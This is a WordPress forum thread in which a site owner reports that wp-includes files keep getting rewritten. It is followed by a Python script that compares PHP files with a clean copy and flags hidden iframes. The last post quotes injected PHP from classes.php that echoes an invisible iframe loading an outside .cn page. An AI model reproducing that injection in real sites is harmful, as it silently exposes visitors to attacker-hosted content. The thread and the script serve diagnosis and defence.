Forum Replies Created

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter coalminecanary

    (@coalminecanary)

    OK does any of this look suspect in the database?

    wp_comments              1      6.2 KiB    -
    wp_links                 7      4.5 KiB    -
    wp_options               149    485.0 KiB  608 B
    wp_postmeta              42     9.5 KiB    96 B
    wp_posts                 21     31.8 KiB   -
    wp_terms                 13     5.5 KiB    -
    wp_term_relationships    27     3.6 KiB    -
    wp_term_taxonomy         13     3.6 KiB    -
    wp_usermeta              15     8.3 KiB    -
    wp_users                 2      4.2 KiB    -
    wp_yapbimage             16     4.0 KiB    -
    11 table(s)  Sum         306    566.3 KiB  704 B

    Also, where does WP store the database user info? I should verify that it is not world readable, right? After install I was not directed to change any file permissions so it's possible that the db login is in a world readable file…

    This is where I will start, as well as changing passwords, and see what happens.

    Thanks!

    Thread Starter coalminecanary

    (@coalminecanary)

    Hm

    So what I am wondering is HOW these PHP files are getting written over?

    When I replace them with FTP, the site works for some time.

    Then later on, the site is broken and all of the wp-includes files have been edited by whatever script.

    My site is hosted remotely by DreamHost on a Unix-based server. My guess is that the bot is accessing these files through some sort of exploit.

    WordPress is the ONLY thing installed on this website!

    Thread Starter coalminecanary

    (@coalminecanary)

    So wait, this is a program ON the webserver that caused it for you?

    Or a program on the computer with which you FTP into the webserver?

    Thanks!

    Thread Starter coalminecanary

    (@coalminecanary)

    This is only happening to my WordPress includes directory. I have lots of other PHP files on the server under the same FTP login. wp-includes only has write access by owner, I double checked that…

    Thread Starter coalminecanary

    (@coalminecanary)

    For the record, my host is DreamHost.

    Was this happening on all of your PHP files? Or just certain directories? Just WordPress files?

    Thread Starter coalminecanary

    (@coalminecanary)

    Interesting.

    So on my webserver, the end of classes.php looks like this:

    function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'
    echo '<iframe src="https://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';
    ?>		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();
    	}
    }
    
    ?>
    ?>
    ?>

    And my local copy is:

    function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'?><wp_ajax>";
    		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();
    	}
    }
    
    ?>

    So, is there something in WP that could allow external access to the wp-includes folder? This definitely appears to be bot-like… search and replace of header text…

    I will check with ISP as well.

    Thanks!
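
The manual comparison in the last post (server copy of classes.php against the clean local copy) can be run over a whole tree. The script below is an added example, not part of the original posts: it hashes every .php file in a live tree against a known-good copy and flags hidden iframes like the one shown above. The file names, sample contents and the example.invalid URL in `demo()` are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic for an invisible iframe like the one in the modified classes.php:
# hidden via CSS, or sized 0/1 pixel in both dimensions.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none|"
    r"width=[\"']?[01][\"']?\s[^>]*height=[\"']?[01][\"']?[\s>])", re.I)

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(clean_root, live_root):
    """Map each suspicious .php file (path relative to live_root) to its findings."""
    clean_root, live_root = Path(clean_root), Path(live_root)
    findings = {}
    for live in sorted(live_root.rglob("*.php")):
        rel = live.relative_to(live_root).as_posix()
        clean, notes = clean_root / rel, []
        if not clean.is_file():
            notes.append("not in clean copy")
        elif sha256(clean) != sha256(live):
            notes.append("differs from clean copy")
        if HIDDEN_IFRAME.search(live.read_text(errors="replace")):
            notes.append("hidden iframe")
        if notes:
            findings[rel] = notes
    return findings

def demo():
    """Build constructed clean/live trees in a temp dir and audit them."""
    good = "<?php\nfunction send() { echo '<wp_ajax>'; }\n?>\n"
    # Constructed injection; example.invalid is a placeholder host.
    bad = good + ("<?php echo '<iframe src=\"https://example.invalid/x.php\" width=\"1\" "
                  "height=\"1\" style=\"visibility:hidden\"></iframe>'; ?>\n")
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "wp-includes").mkdir(parents=True)
        (clean / "wp-includes/classes.php").write_text(good)
        (clean / "wp-includes/cache.php").write_text(good)
        (live / "wp-includes/classes.php").write_text(bad)    # tampered
        (live / "wp-includes/cache.php").write_text(good)     # untouched
        (live / "wp-includes/extra.php").write_text(good)     # dropped file
        return audit(clean, live)

if __name__ == "__main__":
    for path, notes in demo().items():
        print(path, "->", ", ".join(notes))
```

To use it on a real site, call `audit()` with a freshly downloaded copy of the same WordPress version as the clean tree and a downloaded copy of the server's files as the live tree.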
